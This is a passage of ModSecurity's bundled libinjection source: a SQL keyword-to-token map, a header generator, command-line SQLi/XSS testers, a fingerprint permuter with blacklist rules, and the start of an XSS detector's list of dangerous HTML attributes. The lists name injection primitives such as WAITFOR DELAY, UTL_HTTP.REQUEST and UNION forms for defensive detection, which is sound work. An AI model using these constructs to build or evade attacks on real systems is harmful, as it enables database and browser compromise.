"SYSOBJECTS": "k", "SYSTEM_USER": "f", "SYSUSERS": "k", "SYSUTCDATETME": "f", "TABLE": "n", "TAN": "f", "TERMINATED": "k", "TERTIARY_WEIGHTS": "f", "TEXT": "t", "TEXTPOS": "f", "TEXTPTR": "f", "TEXTVALID": "f", "THEN": "k", "TIME": "k", "TIMEDIFF": "f", "TIMEFROMPARTS": "f", "TIMEOFDAY": "f", "TIMESERIAL": "f", "TIMESTAMP": "t", "TIMESTAMPADD": "f", "TIMEVALUE": "f", "TIME_FORMAT": "f", "TIME_TO_SEC": "f", "TINYBLOB": "k", "TINYINT": "k", "TINYTEXT": "k", "TODATETIMEOFFSET": "f", "TOP": "k", "TOTAL": "f", "TOTAL_CHANGES": "f", "TO_ASCII": "f", "TO_BASE64": "f", "TO_CHAR": "f", "TO_DATE": "f", "TO_DAYS": "f", "TO_HEX": "f", "TO_NUMBER": "f", "TO_SECONDS": "f", "TO_TIMESTAMP": "f", "TRAILING": "n", "TRANSACTION_TIMESTAMP": "f", "TRANSLATE": "f", "TRIGGER": "k", "TRIGGER_NESTLEVEL": "f", "TRIM": "f", "TRUE": "1", "TRUNC": "f", "TRUNCATE": "f", "TRY": "T", "TRY_CAST": "f", "TRY_CONVERT": "f", "TRY_PARSE": "f", "TYPEOF": "f", "TYPEPROPERTY": "f", "TYPE_ID": "f", "TYPE_NAME": "f", "UCASE": "f", "UESCAPE": "o", "UNCOMPRESS": "f", "UNCOMPRESS_LENGTH": "f", "UNDO": "k", "UNHEX": "f", "UNICODE": "f", "UNION": "U", "UNION ALL": "U", "UNION ALL DISTINCT": "U", "UNION DISTINCT": "U", "UNION DISTINCT ALL": "U", "UNIQUE": "n", "UNIX_TIMESTAMP": "f", "UNI_ON": "U", "UNKNOWN": "v", "UNLOCK": "k", "UNNEST": "f", "UNSIGNED": "k", "UPDATE": "E", "UPDATEXML": "f", "UPPER": "f", "UPPER_INC": "f", "UPPER_INF": "f", "USAGE": "k", "USE": "T", "USER": "n", "USER_ID": "n", "USER_LOCK.SLEEP": "f", "USER_NAME": "n", "USING": "f", "UTC_DATE": "k", "UTC_TIME": "k", "UTC_TIMESTAMP": "k", "UTL_HTTP.REQUEST": "f", "UTL_INADDR.GET_HOST_ADDRESS": "f", "UTL_INADDR.GET_HOST_NAME": "f", "UUID": "f", "UUID_SHORT": "f", "VALUES": "k", "VAR": "f", "VARBINARY": "k", "VARCHAR": "t", "VARCHARACTER": "k", "VARIANCE": "f", "VARP": "f", "VARYING": "k", "VAR_POP": "f", "VAR_SAMP": "f", "VERIFYSIGNEDBYASMKEY": "f", "VERIFYSIGNEDBYCERT": "f", "VERSION": "f", "VOID": "t", "WAIT": "k", "WAITFOR": "n", "WAITFOR DELAY": "E", "WAITFOR RECEIVE": "E", "WAITFOR TIME": "E", "WEEK": "f", "WEEKDAY": "f", "WEEKDAYNAME": "f", "WEEKOFYEAR": "f", "WHEN": "k", "WHERE": "k", "WHILE": "T", "WIDTH_BUCKET": "f", "WITH": "n", "WITH ROLLUP": "k", "XMLAGG": "f", "XMLCOMMENT": "f", "XMLCONCAT": "f", "XMLELEMENT": "f", "XMLEXISTS": "f", "XMLFOREST": "f", "XMLFORMAT": "f", "XMLPI": "f", "XMLROOT": "f", "XMLTYPE": "f", "XML_IS_WELL_FORMED": "f", "XOR": "&", "XPATH": "f", "XPATH_EXISTS": "f", "XP_EXECRESULTSET": "k", "YEAR": "f", "YEARWEEK": "f", "YEAR_MONTH": "k", "ZEROBLOB": "f", "ZEROFILL": "k", "^=": "o", "_ARMSCII8": "t", "_ASCII": "t", "_BIG5": "t", "_BINARY": "t", "_CP1250": "t", "_CP1251": "t", "_CP1257": "t", "_CP850": "t", "_CP852": "t", "_CP866": "t", "_CP932": "t", "_DEC8": "t", "_EUCJPMS": "t", "_EUCKR": "t", "_GB2312": "t", "_GBK": "t", "_GEOSTD8": "t", "_GREEK": "t", "_HEBREW": "t", "_HP8": "t", "_KEYBCS2": "t", "_KOI8R": "t", "_KOI8U": "t", "_LATIN1": "t", "_LATIN2": "t", "_LATIN5": "t", "_LATIN7": "t", "_MACCE": "t", "_MACROMAN": "t", "_SJIS": "t", "_SWE7": "t", "_TIS620": "t", "_UJIS": "t", "_USC2": "t", "_UTF8": "t", "|/": "o", "|=": "o", "||": "&", "~*": "o" } } modsecurity-v3.0.4/others/libinjection/src/sqlparse2c.py0000755000175000017500000000733013607066311023713 0ustar zimmerlezimmerle#!/usr/bin/env python # # Copyright 2012, 2013 Nick Galbreath # nickg@client9.com # BSD License -- see COPYING.txt for details # """ Converts a libinjection JSON data file to a C header (.h) file """ import sys def toc(obj): """ main routine """ print """ #ifndef LIBINJECTION_SQLI_DATA_H #define LIBINJECTION_SQLI_DATA_H #include "libinjection.h" #include "libinjection_sqli.h" typedef struct { const char *word; char type; } keyword_t; static size_t parse_money(sfilter * sf); static size_t parse_other(sfilter * sf); static size_t parse_white(sfilter * sf); static size_t parse_operator1(sfilter *sf); static size_t parse_char(sfilter *sf); static size_t parse_hash(sfilter *sf); static size_t parse_dash(sfilter *sf); static size_t parse_slash(sfilter *sf); static size_t parse_backslash(sfilter * sf); static size_t parse_operator2(sfilter *sf); static size_t parse_string(sfilter *sf); static size_t parse_word(sfilter * sf); static size_t parse_var(sfilter * sf); static size_t parse_number(sfilter * sf); static size_t parse_tick(sfilter * sf); static size_t parse_ustring(sfilter * sf); static size_t parse_qstring(sfilter * sf); static size_t parse_nqstring(sfilter * sf); static size_t parse_xstring(sfilter * sf); static size_t parse_bstring(sfilter * sf); static size_t parse_estring(sfilter * sf); static size_t parse_bword(sfilter * sf); """ # # Mapping of character to function # fnmap = { 'CHAR_WORD' : 'parse_word', 'CHAR_WHITE': 'parse_white', 'CHAR_OP1' : 'parse_operator1', 'CHAR_UNARY': 'parse_operator1', 'CHAR_OP2' : 'parse_operator2', 'CHAR_BANG' : 'parse_operator2', 'CHAR_BACK' : 'parse_backslash', 'CHAR_DASH' : 'parse_dash', 'CHAR_STR' : 'parse_string', 'CHAR_HASH' : 'parse_hash', 'CHAR_NUM' : 'parse_number', 'CHAR_SLASH': 'parse_slash', 'CHAR_SEMICOLON' : 'parse_char', 'CHAR_COMMA': 'parse_char', 'CHAR_LEFTPARENS': 'parse_char', 'CHAR_RIGHTPARENS': 'parse_char', 'CHAR_LEFTBRACE': 'parse_char', 'CHAR_RIGHTBRACE': 'parse_char', 'CHAR_VAR' : 'parse_var', 'CHAR_OTHER': 'parse_other', 'CHAR_MONEY': 'parse_money', 'CHAR_TICK' : 'parse_tick', 'CHAR_UNDERSCORE': 'parse_underscore', 'CHAR_USTRING' : 'parse_ustring', 'CHAR_QSTRING' : 'parse_qstring', 'CHAR_NQSTRING' : 'parse_nqstring', 'CHAR_XSTRING' : 'parse_xstring', 'CHAR_BSTRING' : 'parse_bstring', 'CHAR_ESTRING' : 'parse_estring', 'CHAR_BWORD' : 'parse_bword' } print print "typedef size_t (*pt2Function)(sfilter *sf);" print "static const pt2Function char_parse_map[] = {" pos = 0 for character in obj['charmap']: print " &%s, /* %d */" % (fnmap[character], pos) pos += 1 print "};" print # keywords # load them keywords = obj['keywords'] for fingerprint in list(obj[u'fingerprints']): fingerprint = '0' + fingerprint.upper() keywords[fingerprint] = 'F' needhelp = [] for key in keywords.iterkeys(): if key != key.upper(): needhelp.append(key) for key in needhelp: tmpv = keywords[key] del keywords[key] keywords[key.upper()] = tmpv print "static const keyword_t sql_keywords[] = {" for k in sorted(keywords.keys()): if len(k) > 31: sys.stderr.write("ERROR: keyword greater than 32 chars\n") sys.exit(1) print " {\"%s\", '%s'}," % (k, keywords[k]) print "};" print "static const size_t sql_keywords_sz = %d;" % (len(keywords), ) print "#endif" return 0 if __name__ == '__main__': import json sys.exit(toc(json.load(sys.stdin))) modsecurity-v3.0.4/others/libinjection/src/sqli_cli.c0000644000175000017500000000764313607066311023231 0ustar zimmerlezimmerle/** * Copyright 2012, 2013 Nick Galbreath * nickg@client9.com * BSD License -- see COPYING.txt for details * * This is for testing against files in ../data/ *.txt * Reads from stdin or a list of files, and emits if a line * is a SQLi attack or not, and does basic statistics * */ #include #include #include #include "libinjection.h" #include "libinjection_sqli.h" void print_string(stoken_t* t); void print_var(stoken_t* t); void print_token(stoken_t *t); void print_string(stoken_t* t) { /* print opening quote */ if (t->str_open != '\0') { printf("%c", t->str_open); } /* print content */ printf("%s", t->val); /* print closing quote */ if (t->str_close != '\0') { printf("%c", t->str_close); } } void print_var(stoken_t* t) { if (t->count >= 1) { printf("%c", '@'); } if (t->count == 2) { printf("%c", '@'); } print_string(t); } void print_token(stoken_t *t) { printf("%c ", t->type); switch (t->type) { case 's': print_string(t); break; case 'v': print_var(t); break; default: printf("%s", t->val); } printf("%s", "\n"); } void usage() { printf("\n"); printf("libinjection sqli tester\n"); printf("\n"); printf(" -ca parse as ANSI SQL\n"); printf(" -cm parse as MySQL SQL\n"); printf(" -q0 parse as is\n"); printf(" -q1 parse in single-quote mode\n"); printf(" -q2 parse in doiuble-quote mode\n"); printf("\n"); printf(" -f --fold fold results\n"); printf("\n"); printf(" -d --detect detect SQLI. empty reply = not detected\n"); printf("\n"); } int main(int argc, const char* argv[]) { size_t slen; char* copy; int flags = 0; int fold = 0; int detect = 0; int i; int count; int offset = 1; int issqli; sfilter sf; if (argc < 2) { usage(); return 1; } while (1) { if (strcmp(argv[offset], "-h") == 0 || strcmp(argv[offset], "-?") == 0 || strcmp(argv[offset], "--help") == 0) { usage(); return 1; } if (strcmp(argv[offset], "-m") == 0) { flags |= FLAG_SQL_MYSQL; offset += 1; } else if (strcmp(argv[offset], "-f") == 0 || strcmp(argv[offset], "--fold") == 0) { fold = 1; offset += 1; } else if (strcmp(argv[offset], "-d") == 0 || strcmp(argv[offset], "--detect") == 0) { detect = 1; offset += 1; } else if (strcmp(argv[offset], "-ca") == 0) { flags |= FLAG_SQL_ANSI; offset += 1; } else if (strcmp(argv[offset], "-cm") == 0) { flags |= FLAG_SQL_MYSQL; offset += 1; } else if (strcmp(argv[offset], "-q0") == 0) { flags |= FLAG_QUOTE_NONE; offset += 1; } else if (strcmp(argv[offset], "-q1") == 0) { flags |= FLAG_QUOTE_SINGLE; offset += 1; } else if (strcmp(argv[offset], "-q2") == 0) { flags |= FLAG_QUOTE_DOUBLE; offset += 1; } else { break; } } /* ATTENTION: argv is a C-string, null terminated. We copy this * to it's own location, WITHOUT null byte. This way, valgrind * can see if we run past the buffer. */ slen = strlen(argv[offset]); copy = (char* ) malloc(slen); memcpy(copy, argv[offset], slen); libinjection_sqli_init(&sf, copy, slen, flags); if (detect == 1) { issqli = libinjection_is_sqli(&sf); if (issqli) { printf("%s\n", sf.fingerprint); } } else if (fold == 1) { count = libinjection_sqli_fold(&sf); for (i = 0; i < count; ++i) { print_token(&(sf.tokenvec[i])); } } else { while (libinjection_sqli_tokenize(&sf)) { print_token(sf.current); } } free(copy); return 0; } modsecurity-v3.0.4/others/libinjection/src/reader.c0000644000175000017500000002012113607066311022656 0ustar zimmerlezimmerle#include #include #include #include #include "libinjection.h" #include "libinjection_sqli.h" #include "libinjection_xss.h" #ifndef TRUE #define TRUE 1 #endif #ifndef FALSE #define FALSE 0 #endif static int g_test_ok = 0; static int g_test_fail = 0; typedef enum { MODE_SQLI, MODE_XSS } detect_mode_t; static void usage(const char* argv[]); size_t modp_rtrim(char* str, size_t len); void modp_toprint(char* str, size_t len); void test_positive(FILE * fd, const char *fname, detect_mode_t mode, int flag_invert, int flag_true, int flag_quiet); int urlcharmap(char ch); size_t modp_url_decode(char* dest, const char* s, size_t len); int urlcharmap(char ch) { switch (ch) { case '0': return 0; case '1': return 1; case '2': return 2; case '3': return 3; case '4': return 4; case '5': return 5; case '6': return 6; case '7': return 7; case '8': return 8; case '9': return 9; case 'a': case 'A': return 10; case 'b': case 'B': return 11; case 'c': case 'C': return 12; case 'd': case 'D': return 13; case 'e': case 'E': return 14; case 'f': case 'F': return 15; default: return 256; } } size_t modp_url_decode(char* dest, const char* s, size_t len) { const char* deststart = dest; size_t i = 0; int d = 0; while (i < len) { switch (s[i]) { case '+': *dest++ = ' '; i += 1; break; case '%': if (i+2 < len) { d = (urlcharmap(s[i+1]) << 4) | urlcharmap(s[i+2]); if ( d < 256) { *dest = (char) d; dest++; i += 3; /* loop will increment one time */ } else { *dest++ = '%'; i += 1; } } else { *dest++ = '%'; i += 1; } break; default: *dest++ = s[i]; i += 1; } } *dest = '\0'; return (size_t)(dest - deststart); /* compute "strlen" of dest */ } void modp_toprint(char* str, size_t len) { size_t i; for (i = 0; i < len; ++i) { if (str[i] < 32 || str[i] > 126) { str[i] = '?'; } } } size_t modp_rtrim(char* str, size_t len) { while (len) { char c = str[len -1]; if (c == ' ' || c == '\n' || c == '\t' || c == '\r') { str[len -1] = '\0'; len -= 1; } else { break; } } return len; } void test_positive(FILE * fd, const char *fname, detect_mode_t mode, int flag_invert, int flag_true, int flag_quiet) { char linebuf[8192]; int issqli = 0; int linenum = 0; size_t len; sfilter sf; while (fgets(linebuf, sizeof(linebuf), fd)) { linenum += 1; len = modp_rtrim(linebuf, strlen(linebuf)); if (len == 0) { continue; } if (linebuf[0] == '#') { continue; } len = modp_url_decode(linebuf, linebuf, len); switch (mode) { case MODE_SQLI: { libinjection_sqli_init(&sf, linebuf, len, 0); issqli = libinjection_is_sqli(&sf); break; } case MODE_XSS: { issqli = libinjection_xss(linebuf, len); break; } default: assert(0); } if (issqli) { g_test_ok += 1; } else { g_test_fail += 1; } if (!flag_quiet) { if ((issqli && flag_true && ! flag_invert) || (!issqli && flag_true && flag_invert) || !flag_true) { modp_toprint(linebuf, len); switch (mode) { case MODE_SQLI: { /* * if we didn't find a SQLi and fingerprint from * sqlstats is is 'sns' or 'snsns' then redo using * plain context */ if (!issqli && (strcmp(sf.fingerprint, "sns") == 0 || strcmp(sf.fingerprint, "snsns") == 0)) { libinjection_sqli_fingerprint(&sf, 0); } fprintf(stdout, "%s\t%d\t%s\t%s\t%s\n", fname, linenum, (issqli ? "True" : "False"), sf.fingerprint, linebuf); break; } case MODE_XSS: { fprintf(stdout, "%s\t%d\t%s\t%s\n", fname, linenum, (issqli ? "True" : "False"), linebuf); break; } default: assert(0); } } } } } static void usage(const char* argv[]) { fprintf(stdout, "usage: %s [flags] [files...]\n", argv[0]); fprintf(stdout, "%s\n", ""); fprintf(stdout, "%s\n", "-q --quiet : quiet mode"); fprintf(stdout, "%s\n", "-m --max-fails : number of failed cases need to fail entire test"); fprintf(stdout, "%s\n", "-s INTEGER : repeat each test N time " "(for performance testing)"); fprintf(stdout, "%s\n", "-t : only print positive matches"); fprintf(stdout, "%s\n", "-x --mode-xss : test input for XSS"); fprintf(stdout, "%s\n", "-i --invert : invert test logic " "(input is tested for being safe)"); fprintf(stdout, "%s\n", ""); fprintf(stdout, "%s\n", "-? -h -help --help : this page"); fprintf(stdout, "%s\n", ""); } int main(int argc, const char *argv[]) { /* * invert output, by */ int flag_invert = FALSE; /* * don't print anything.. useful for * performance monitors, gprof. */ int flag_quiet = FALSE; /* * only print positive results * with invert, only print negative results */ int flag_true = FALSE; detect_mode_t mode = MODE_SQLI; int flag_slow = 1; int count = 0; int max = -1; int i, j; int offset = 1; while (offset < argc) { if (strcmp(argv[offset], "-?") == 0 || strcmp(argv[offset], "-h") == 0 || strcmp(argv[offset], "-help") == 0 || strcmp(argv[offset], "--help") == 0) { usage(argv); exit(0); } if (strcmp(argv[offset], "-i") == 0) { offset += 1; flag_invert = TRUE; } else if (strcmp(argv[offset], "-q") == 0 || strcmp(argv[offset], "--quiet") == 0) { offset += 1; flag_quiet = TRUE; } else if (strcmp(argv[offset], "-t") == 0) { offset += 1; flag_true = TRUE; } else if (strcmp(argv[offset], "-s") == 0) { offset += 1; flag_slow = 100; } else if (strcmp(argv[offset], "-m") == 0 || strcmp(argv[offset], "--max-fails") == 0) { offset += 1; max = atoi(argv[offset]); offset += 1; } else if (strcmp(argv[offset], "-x") == 0 || strcmp(argv[offset], "--mode-xss") == 0) { mode = MODE_XSS; offset += 1; } else { break; } } if (offset == argc) { test_positive(stdin, "stdin", mode, flag_invert, flag_true, flag_quiet); } else { for (j = 0; j < flag_slow; ++j) { for (i = offset; i < argc; ++i) { FILE* fd = fopen(argv[i], "r"); if (fd) { test_positive(fd, argv[i], mode, flag_invert, flag_true, flag_quiet); fclose(fd); } } } } if (!flag_quiet) { fprintf(stdout, "%s", "\n"); fprintf(stdout, "SQLI : %d\n", g_test_ok); fprintf(stdout, "SAFE : %d\n", g_test_fail); fprintf(stdout, "TOTAL : %d\n", g_test_ok + g_test_fail); } if (max == -1) { return 0; } count = g_test_ok; if (flag_invert) { count = g_test_fail; } if (count > max) { printf("\nThreshold is %d, got %d, failing.\n", max, count); return 1; } else { printf("\nThreshold is %d, got %d, passing.\n", max, count); return 0; } } modsecurity-v3.0.4/others/libinjection/src/make_parens.py0000755000175000017500000002651613607066311024130 0ustar zimmerlezimmerle#!/usr/bin/env python # pylint: disable=C0103,R0911,R0912,R0915 # disable short-variable-names, too many branches, returns, statements """ fingerprint fuzzer and generator Given a fingerprint, this generates other similar fingerprints that are functionally equivalent for SQLi detection """ import sys class PermuteFingerprints(object): """ class to mutate / fuzz fingerprints to find new SQLi """ def __init__(self): """ initialization """ self.fingerprints = set() self.blacklist = set([ 'E1n', 'sns', '1&n', 's1s', '1n1', '1o1', '1os', 'sn1', 'sonc', 'so1', 'n&n', 'son', 'nov', 'n&s', 'E1s', 'nos', 'nkn&n', '1sn', 'n&nkn', 's1n', 'n&nEn', 's&sn', '1os1o', 'sU', 'nU', 'n,(n)', 'n&n&n', 'Enkn', 'nk1;', '1os1o', '1n1;', 's*1s', '1s1', 'nknEn', 'n&sn', 'so1', 'nkn;', 'n&n;', 'von', 'n&nc', 'sonkn', 'n)o1', 'Enn;', 'nBn', 'Ennc', 'n&En', 'nEnEn', 'Esn', 'n1s', 'n(1)s', 'En1', 'En(1)', 'n(1)n', 'n1v', 'n(1)1', 'n&EUE', 'n&EkU', 's&EUE', 's&EkU', 'v&EUE', 'v&EkU', 'n&nTn', 'nA', 'nos;n', 'UEn', 'so1no', '1)on', '1k(1)', 's)on', '1;TnE', 's&1s', 'n)c', 'svs', '1n(1)', 'so1s(', 'son1s', 'nf(1n', 'so1sf', 'son1s', 'nf(n)', 'En1c', 'n)on', "nok&n", "n;Tkn", "nEnc", "nok&1", "nok&f", "nok&s", "nok&v", "nk(n)", "nknc", "son1n", "n&nBn", ]) self.whitelist = set([ 'T(vv)', 'Tnvos', 'Tnv;', '1UEnn', '1;Tvk' ]) def aslist(self): """ return the fingerprints as a sorted list """ return sorted(list(self.fingerprints)) def insert(self, fingerprint): """ insert a new fingerprint, with possible variations """ if len(fingerprint) > 5: fingerprint = fingerprint[0:5] if self.validate(fingerprint): self.fingerprints.add(fingerprint) def validate(self, s): """ detemines if a fingerprint could be used a SQLi """ if len(s) == 0: return False if s in self.whitelist: return True if s in self.blacklist: return False # SQL Types are rarely used if 't' in s and 'f(t' not in s and 'At' not in s: return False if 'Un' in s: return False if '1nf' in s: return False if 's1o' in s: return False if 'oo' in s: return False if 'v,s' in s: return False if 's,v' in s: return False if 'v,v' in s: return False if 'v,1' in s: return False if 'v,n' in s: return False if 'n,v' in s: return False if '1,v' in s: return False if 'Eo(' in s: return False if '(o(' in s: return False if '(o1' in s: return False if '(on' in s: return False if '(os' in s: return False if '(of' in s: return False if '(ov' in s: return False if 'B(n)' in s: return False if 'oso' in s: return False if 'o1o' in s: return False if 'ono' in s: return False # only 1 special case for this # 1;foo:goto foo # 1;n:k # the 'foo' can only be a 'n' type if ':' in s and not 'n:' in s: return False if '11' in s: return False if '))' in s: return False if '((' in s: return False if 'v1' in s: return False if 'nv' in s and 'T' not in s: return False if 'nn' in s and 'T' not in s: return False # select @version foo is legit # but unlikely anywhere else if 'vn' in s and 'Evn' not in s: return False if 'oE' in s: return False if 'A1' in s: return False if 'An' in s: return False if 'A(1' in s: return False if 'vov' in s: return False if 'vo1' in s: return False if 'von' in s: return False if 'ns' in s: if 'U' in s: return True if 'T' in s: return True return False if 'sn' in s: # that is... Tsn is ok if s.find('T') != -1 and s.find('T') < s.find('sn'): return True return False # select foo (as) bar is only nn type i know if 'nn' in s and 'Enn' not in s and 'T' not in s: return False if ',o' in s: return False if 'kk' in s and 'Tkk' not in s: return False if 'ss' in s: return False if 'ff' in s: return False if '1no' in s: return False if 'kno' in s: return False if 'nEk' in s: return False if 'n(n' in s: return False if '1so' in s: return False if '1s1' in s: return False if 'noo' in s: return False if 'ooo' in s: return False if 'vvv' in s: return False if '1vn' in s: return False if '1n1' in s: return False if '&1n' in s: return False if '&1v' in s: return False if '&1s' in s: return False if 'nnk' in s: return False if 'n1f' in s: return False # folded away if s.startswith('('): return False if '&o' in s: return False if '1,1' in s: return False if '1,s' in s: return False if '1,n' in s: return False if 's,1' in s: return False if 's,s' in s: return False if 's,n' in s: return False if 'n,1' in s: return False if 'n,s' in s: return False if 'n,n' in s: return False if '1o1' in s: return False if '1on' in s: return False if 'no1' in s: return False if 'non' in s: return False if '1(v' in s: return False if '1(n' in s: return False if '1(s' in s: return False if '1(1' in s: return False if 's(s' in s: return False if 's(n' in s: return False if 's(1' in s: return False if 's(v' in s: return False if 'v(s' in s: return False if 'v(n' in s: return False if 'v(1' in s and 'Tv(1' not in s: return False if 'v(v' in s: return False if 'TTT' in s: return False if s.startswith('n('): return False if s.startswith('vs'): return False if s.startswith('o'): return False if ')(' in s: return False # need to investigate T(vv) to see # if it's correct if 'vv' in s and s != 'T(vv)': return False # unlikely to be sqli but case FP if s in ('so1n)', 'sonoE'): return False return True def permute(self, fp): """ generate alternative (possiblely invalid) fingerprints """ self.insert(fp) # do this for safety if len(fp) > 1 and len(fp) < 5 and fp[-1] != ';' and fp[-1] != 'c': self.insert(fp + ";") self.insert(fp + ";c") # do this for safety if len(fp) > 1 and len(fp) < 5 and fp[-1] != 'c': self.insert(fp + "c") for i in range(len(fp)): if fp[i] == '1': self.insert(fp[0:i] + 'n' + fp[i+1:]) self.insert(fp[0:i] + 'v' + fp[i+1:]) self.insert(fp[0:i] + 's' + fp[i+1:]) self.insert(fp[0:i] + 'f(1)' + fp[i+1:]) self.insert(fp[0:i] + 'f()' + fp[i+1:]) self.insert(fp[0:i] + '1os' + fp[i+1:]) self.insert(fp[0:i] + '1ov' + fp[i+1:]) self.insert(fp[0:i] + '1on' + fp[i+1:]) self.insert(fp[0:i] + '(1)' + fp[i+1:]) elif fp[i] == 's': self.insert(fp[0:i] + 'v' + fp[i+1:]) self.insert(fp[0:i] + '1' + fp[i+1:]) self.insert(fp[0:i] + 'f(1)' + fp[i+1:]) self.insert(fp[0:i] + 'f()' + fp[i+1:]) self.insert(fp[0:i] + 'so1' + fp[i+1:]) self.insert(fp[0:i] + 'sov' + fp[i+1:]) self.insert(fp[0:i] + 'son' + fp[i+1:]) self.insert(fp[0:i] + '(s)' + fp[i+1:]) elif fp[i] == 'v': self.insert(fp[0:i] + 's' + fp[i+1:]) self.insert(fp[0:i] + '1' + fp[i+1:]) self.insert(fp[0:i] + 'f(1)' + fp[i+1:]) self.insert(fp[0:i] + 'f()' + fp[i+1:]) self.insert(fp[0:i] + 'vo1' + fp[i+1:]) self.insert(fp[0:i] + 'vos' + fp[i+1:]) self.insert(fp[0:i] + 'von' + fp[i+1:]) self.insert(fp[0:i] + '(v)' + fp[i+1:]) elif fp[i] == 'E': # Select top, select distinct, case when self.insert(fp[0:i] + 'Ek' + fp[i+1:]) elif fp[i] == ')': self.insert(fp[0:i] + '))' + fp[i+1:]) self.insert(fp[0:i] + ')))' + fp[i+1:]) self.insert(fp[0:i] + '))))' + fp[i+1:]) if ';E' in fp: self.insert(fp.replace(';E', ';T')) if fp.startswith('T'): self.insert('1;' + fp) self.insert('1);' + fp) if 'At' in fp: self.insert(fp.replace('At', 'As')) if '(' in fp: done = False parts = [] for char in fp: if char == '(' and done is False: parts.append(char) done = True parts.append(char) newline = ''.join(parts) self.insert(newline) done = False parts = [] for char in fp: if char == '(': if done is True: parts.append(char) else: done = True parts.append(char) newline = ''.join(parts) self.insert(newline) done = False parts = [] for char in fp: if char == '(': parts.append(char) parts.append(char) newline = ''.join(parts) self.insert(newline) def main(): """ main entrance """ mutator = PermuteFingerprints() for line in sys.stdin: mutator.permute(line.strip()) for fingerprint in mutator.aslist(): print fingerprint if __name__ == '__main__': main() modsecurity-v3.0.4/others/libinjection/src/libinjection_xss.h0000644000175000017500000000041313607066311024771 0ustar zimmerlezimmerle#ifndef LIBINJECTION_XSS #define LIBINJECTION_XSS #ifdef __cplusplus extern "C" { #endif /** * HEY THIS ISN'T DONE */ /* pull in size_t */ #include int libinjection_is_xss(const char* s, size_t len, int flags); #ifdef __cplusplus } #endif #endif modsecurity-v3.0.4/others/libinjection/src/libinjection_xss.c0000644000175000017500000003430313607066311024771 0ustar zimmerlezimmerle #include "libinjection.h" #include "libinjection_xss.h" #include "libinjection_html5.h" #include #include typedef enum attribute { TYPE_NONE , TYPE_BLACK /* ban always */ , TYPE_ATTR_URL /* attribute value takes a URL-like object */ , TYPE_STYLE , TYPE_ATTR_INDIRECT /* attribute *name* is given in *value* */ } attribute_t; static attribute_t is_black_attr(const char* s, size_t len); static int is_black_tag(const char* s, size_t len); static int is_black_url(const char* s, size_t len); static int cstrcasecmp_with_null(const char *a, const char *b, size_t n); static int html_decode_char_at(const char* src, size_t len, size_t* consumed); static int htmlencode_startswith(const char* prefix, const char *src, size_t n); typedef struct stringtype { const char* name; attribute_t atype; } stringtype_t; static const int gsHexDecodeMap[256] = { 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 256, 256, 256, 256, 256, 256, 256, 10, 11, 12, 13, 14, 15, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 10, 11, 12, 13, 14, 15, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256, 256 }; static int html_decode_char_at(const char* src, size_t len, size_t* consumed) { int val = 0; size_t i; int ch; if (len == 0 || src == NULL) { *consumed = 0; return -1; } *consumed = 1; if (*src != '&' || len < 2) { return (unsigned char)(*src); } if (*(src+1) != '#') { /* normally this would be for named entities * but for this case we don't actually care */ return '&'; } if (*(src+2) == 'x' || *(src+2) == 'X') { ch = (unsigned char) (*(src+3)); ch = gsHexDecodeMap[ch]; if (ch == 256) { /* degenerate case '&#[?]' */ return '&'; } val = ch; i = 4; while (i < len) { ch = (unsigned char) src[i]; if (ch == ';') { *consumed = i + 1; return val; } ch = gsHexDecodeMap[ch]; if (ch == 256) { *consumed = i; return val; } val = (val * 16) + ch; if (val > 0x1000FF) { return '&'; } ++i; } *consumed = i; return val; } else { i = 2; ch = (unsigned char) src[i]; if (ch < '0' || ch > '9') { return '&'; } val = ch - '0'; i += 1; while (i < len) { ch = (unsigned char) src[i]; if (ch == ';') { *consumed = i + 1; return val; } if (ch < '0' || ch > '9') { *consumed = i; return val; } val = (val * 10) + (ch - '0'); if (val > 0x1000FF) { return '&'; } ++i; } *consumed = i; return val; } } /* * view-source: * data: * javascript: */ static stringtype_t BLACKATTR[] = { { "ACTION", TYPE_ATTR_URL } /* form */ , { "ATTRIBUTENAME", TYPE_ATTR_INDIRECT } /* SVG allow indirection of attribute names */ , { "BY", TYPE_ATTR_URL } /* SVG */ , { "BACKGROUND", TYPE_ATTR_URL } /* IE6, O11 */ , { "DATAFORMATAS", TYPE_BLACK } /* IE */ , { "DATASRC", TYPE_BLACK } /* IE */ , { "DYNSRC", TYPE_ATTR_URL } /* Obsolete img attribute */ , { "FILTER", TYPE_STYLE } /* Opera, SVG inline style */ , { "FORMACTION", TYPE_ATTR_URL } /* HTML 5 */ , { "FOLDER", TYPE_ATTR_URL } /* Only on A tags, IE-only */ , { "FROM", TYPE_ATTR_URL } /* SVG */ , { "HANDLER", TYPE_ATTR_URL } /* SVG Tiny, Opera */ , { "HREF", TYPE_ATTR_URL } , { "LOWSRC", TYPE_ATTR_URL } /* Obsolete img attribute */ , { "POSTER", TYPE_ATTR_URL } /* Opera 10,11 */ , { "SRC", TYPE_ATTR_URL } , { "STYLE", TYPE_STYLE } , { "TO", TYPE_ATTR_URL } /* SVG */ , { "VALUES", TYPE_ATTR_URL } /* SVG */ , { "XLINK:HREF", TYPE_ATTR_URL } , { NULL, TYPE_NONE } }; /* xmlns */ /* `xml-stylesheet` > , */ /* static const char* BLACKATTR[] = { "ATTRIBUTENAME", "BACKGROUND", 